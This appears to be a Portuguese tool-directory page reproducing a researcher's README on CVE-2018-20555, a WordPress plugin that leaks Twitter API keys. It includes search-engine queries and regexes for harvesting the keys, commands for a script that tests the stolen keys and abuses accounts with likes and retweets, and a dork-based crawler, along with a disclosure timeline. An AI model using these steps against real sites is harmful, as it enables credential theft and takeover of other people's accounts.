Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/fs0c131y/cve-2018-20555
OSINT (Inteligência de Fontes Abertas)Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesRastreador
GitHubfs0c131y/cve-2018-20555

CVE-2018-20555

Vulnerabilidade no Plugin Wordpress Social Network Tabs - CVE-2018-20555

Ver Repositório
7118há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
CVE-2018-20555 — Vulnerabilidade no Plugin Wordpress Social Network Tabs - CVE-2018-20555 | Kitploit
Site

CVE-2018-20555

O plugin Wordpress chamado Social Network Tabs, feito pela empresa Design Chemical, está vazando duas vezes o access_token, access_token_secret, consumer_key e consumer_secret do Twitter do seu usuário, o que leva à tomada de conta da sua conta no Twitter.

Isso é causado pelas seguintes linhas de código na página onde o widget do Twitter é exibido:

root@kitploit:~
jQuery(document).ready(function ($) {
	var config = {
		widgets: "twitter,facebook,youtube",
		twitterId: "[redacted]",
		facebookId: "[redacted]",
		youtubeId: "[redacted]",
		twitter: {
			url: "https://www.rainx.com/wp-content/plugins/social-network-tabs/inc/dcwp_twitter.php?1=%5Breadcted%5D&2=%5Bredacted%5D&3=%5Bredacted%5D&4=%5Bredacted%5D …",
			title: "Latest Tweets",
			follow: "Follow",
			followId: "",
			limit: "10",
			retweets: true,
			replies: true,
			images: "thumb",
			consumer_key: "[redacted]",
			consumer_secret: "[redacted]",
			access_token: "[redacted]",
			access_token_secret: "[redacted]"
		},
	}
});

Exploração

Graças ao Publicwww, com as seguintes consultas de pesquisa, consegui recuperar o access_token, access_token_secret, consumer_key e consumer_secret do Twitter de 539 sites vulneráveis:

  • dcwp_twitter.php access_token_secret snipexp:|access_token: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|access_token_secret: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_key: "([\w\d-._]+)"|
  • dcwp_twitter.php access_token_secret snipexp:|consumer_secret: "([\w\d-._]+)"|

Todas as chaves estão disponíveis em twitter_keys.csv.

Como usar

Teste as chaves da API do Twitter em twitter_keys.csv

root@kitploit:~
python test_twitter_api_keys.py -t

Na primeira vez que executei este comando, obtive as informações de 446 contas do Twitter. Vale mencionar que havia 2 contas verificadas na lista e várias contas com mais de 10 mil seguidores. Todas as contas vulneráveis estão em vulnerable_accounts.txt.

Parte divertida

Curta o tweet de sua escolha

root@kitploit:~
python test_twitter_api_keys.py -l [tweet_id]

Retuite o tweet de sua escolha

root@kitploit:~
python test_twitter_api_keys.py -r [tweet_id]

Na primeira vez que executei este comando, consegui curtir o tweet de minha escolha 127 vezes, o que mostrou que 127 chaves da API do Twitter tinham direitos de leitura e escrita, ou seja, fui capaz de assumir 127 contas do Twitter (alterar foto de perfil, curtir, retuitar, mudar a bio, ...) devido a esses vazamentos de chaves.

ATUALIZAÇÃO 17/01/18

Muitos sites e, portanto, contas do Twitter ainda estão vulneráveis a esse problema. Para identificá-los, criei um scraper

root@kitploit:~
cd TwitterApiKeysSearchEngine/

scrapy crawl TwitterApiKeysSpider -a keyword="inurl:/inc/dcwp_twitter.php?1=" -a se=google -a pages=10

O total de resultados para esta consulta de pesquisa no Google é 3550. Entre as 9 primeiras páginas, consegui recuperar 78 chaves (86%). Aproveite!

Divulgação

  • 01/12/18: Divulgação ao Twitter
  • 0X/12/18: O Twitter desativou todas as chaves
  • 11/12/18: Reconhecimento como um problema de segurança válido pelo Twitter

Contato

Siga-me no Twitter! Você também pode encontrar uma pequena parte do meu trabalho em https://fs0c131y.com

Créditos

A investigação e a POC foram feitas com ❤️ por @fs0c131y

Baixar ferramenta